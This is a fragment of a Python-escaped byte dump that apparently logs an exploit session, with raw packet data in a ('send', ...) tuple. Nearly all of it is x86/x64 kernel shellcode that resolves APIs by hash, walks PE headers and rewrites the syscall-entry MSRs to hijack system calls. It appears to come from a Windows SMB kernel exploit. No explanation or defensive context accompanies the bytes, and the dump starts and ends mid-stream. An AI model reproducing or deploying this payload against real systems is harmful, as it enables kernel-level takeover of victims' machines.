^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 10, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 